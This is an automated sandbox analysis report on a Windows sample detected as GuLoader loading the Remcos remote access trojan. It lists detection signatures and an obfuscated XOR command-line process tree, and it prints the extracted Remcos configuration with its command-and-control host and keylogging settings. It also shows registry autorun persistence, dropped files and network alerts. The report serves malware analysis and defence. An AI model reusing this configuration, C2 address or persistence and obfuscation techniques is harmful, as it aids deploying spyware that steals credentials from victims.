Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
asXlZG3aW6.exe

Overview

General Information

Sample name:asXlZG3aW6.exe
Analysis ID:1529110
MD5:51bfab682069e4e7a2ba7b8379d3927b
SHA1:852ac154d253e128199c7cf766d74ac8a6e9d146
SHA256:0ffb9d8b5cc25cd280763fe84065f5f149b17eb5d9e19dd59ba6c324d292572b
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
Submitted sample is a known malware sample
C2 URLs / IPs found in malware configuration
Creates autostart registry keys with suspicious values (likely registry only malware)
Drops PE files with a suspicious file extension
Installs a global keyboard hook
Maps a DLL or memory area into another process
Mass process execution to delay analysis
Obfuscated command line found
Sigma detected: New RUN Key Pointing to Suspicious Folder
Switches to a custom stack to bypass stack traces
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Screensaver Binary File Creation
Suricata IDS alerts with low severity for network traffic
Too many similar processes found
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64native
  • asXlZG3aW6.exe (PID: 3616 cmdline: "C:\Users\user\Desktop\asXlZG3aW6.exe" MD5: 51BFAB682069E4E7A2BA7B8379D3927B)
    • cmd.exe (PID: 5748 cmdline: cmd.exe /c set /a "250^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1528 cmdline: cmd.exe /c set /a "244^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5312 cmdline: cmd.exe /c set /a "227^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5692 cmdline: cmd.exe /c set /a "255^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6692 cmdline: cmd.exe /c set /a "244^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6208 cmdline: cmd.exe /c set /a "253^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7736 cmdline: cmd.exe /c set /a "130^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6268 cmdline: cmd.exe /c set /a "131^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7020 cmdline: cmd.exe /c set /a "139^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2380 cmdline: cmd.exe /c set /a "139^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5416 cmdline: cmd.exe /c set /a "242^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1532 cmdline: cmd.exe /c set /a "195^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4924 cmdline: cmd.exe /c set /a "212^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2624 cmdline: cmd.exe /c set /a "208^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6956 cmdline: cmd.exe /c set /a "197^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7496 cmdline: cmd.exe /c set /a "212^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4472 cmdline: cmd.exe /c set /a "247^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 560 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 308 cmdline: cmd.exe /c set /a "221^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7220 cmdline: cmd.exe /c set /a "212^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4184 cmdline: cmd.exe /c set /a "240^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2996 cmdline: cmd.exe /c set /a "153^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 916 cmdline: cmd.exe /c set /a "220^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1112 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4832 cmdline: cmd.exe /c set /a "195^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6380 cmdline: cmd.exe /c set /a "133^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5748 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6148 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2836 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6692 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3096 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1528 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1500 cmdline: cmd.exe /c set /a "201^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5796 cmdline: cmd.exe /c set /a "137^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1108 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3372 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2660 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5312 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5796 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7568 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6824 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5300 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3200 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1532 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6232 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 428 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5424 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2676 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5300 cmdline: cmd.exe /c set /a "193^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2220 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1608 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6692 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4436 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7736 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 616 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7496 cmdline: cmd.exe /c set /a "133^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5312 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 560 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7568 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2868 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2056 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6148 cmdline: cmd.exe /c set /a "201^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6080 cmdline: cmd.exe /c set /a "137^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 308 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • asXlZG3aW6.exe (PID: 4464 cmdline: "C:\Users\user\Desktop\asXlZG3aW6.exe" MD5: 51BFAB682069E4E7A2BA7B8379D3927B)
      • asXlZG3aW6.exe (PID: 6596 cmdline: C:\Users\user\Desktop\asXlZG3aW6.exe /stext "C:\Users\user\AppData\Local\Temp\lmosdawqehkmlcbfmkivthwvnjpkkkqrhv" MD5: 51BFAB682069E4E7A2BA7B8379D3927B)
      • asXlZG3aW6.exe (PID: 5676 cmdline: C:\Users\user\Desktop\asXlZG3aW6.exe /stext "C:\Users\user\AppData\Local\Temp\wotkesh" MD5: 51BFAB682069E4E7A2BA7B8379D3927B)
      • asXlZG3aW6.exe (PID: 8124 cmdline: C:\Users\user\Desktop\asXlZG3aW6.exe /stext "C:\Users\user\AppData\Local\Temp\yiydflrlgx" MD5: 51BFAB682069E4E7A2BA7B8379D3927B)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "newfarmn.pro:2404:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-13IBN7", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000082.00000003.21793249809.00000000052AC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000082.00000003.21947260967.00000000052AC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000082.00000002.26258711325.000000000019F000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000082.00000002.26269649402.00000000052AC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000082.00000003.21947103754.00000000052BE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
              Click to see the 21 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: New RUN Key Pointing to Suspicious Folder
              Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\Overskuelighedsgrunde\Uforsvarlige.scr, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\asXlZG3aW6.exe, ProcessId: 4464, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Lunendes
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\Overskuelighedsgrunde\Uforsvarlige.scr, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\asXlZG3aW6.exe, ProcessId: 4464, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Lunendes
              Sigma detected: SCR File Write Event
              Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\asXlZG3aW6.exe, ProcessId: 4464, TargetFilename: C:\Users\user\AppData\Local\Temp\Overskuelighedsgrunde\Uforsvarlige.scr
              Sigma detected: Suspicious Screensaver Binary File Creation
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\asXlZG3aW6.exe, ProcessId: 4464, TargetFilename: C:\Users\user\AppData\Local\Temp\Overskuelighedsgrunde\Uforsvarlige.scr

              Stealing of Sensitive Information

              barindex
              Sigma detected: Remcos
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\asXlZG3aW6.exe, ProcessId: 4464, TargetFilename: C:\ProgramData\remcos\logs.dat

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-08T16:52:33.225373+020020365941Malware Command and Control Activity Detected192.168.11.204973641.216.188.1782404TCP
              2024-10-08T16:52:34.443607+020020365941Malware Command and Control Activity Detected192.168.11.204973741.216.188.1782404TCP
              2024-10-08T16:52:34.459283+020020365941Malware Command and Control Activity Detected192.168.11.204973841.216.188.1782404TCP
              2024-10-08T16:52:34.506109+020020365941Malware Command and Control Activity Detected192.168.11.204973941.216.188.1782404TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-08T16:52:34.468675+020028033043Unknown Traffic192.168.11.2049740178.237.33.5080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-08T16:52:24.650841+020028032702Potentially Bad Traffic192.168.11.2049735102.65.21.26443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 00000082.00000002.26269649402.000000000525D000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "newfarmn.pro:2404:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-13IBN7", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\Overskuelighedsgrunde\Uforsvarlige.scrReversingLabs: Detection: 55%
              Multi AV Scanner detection for submitted file
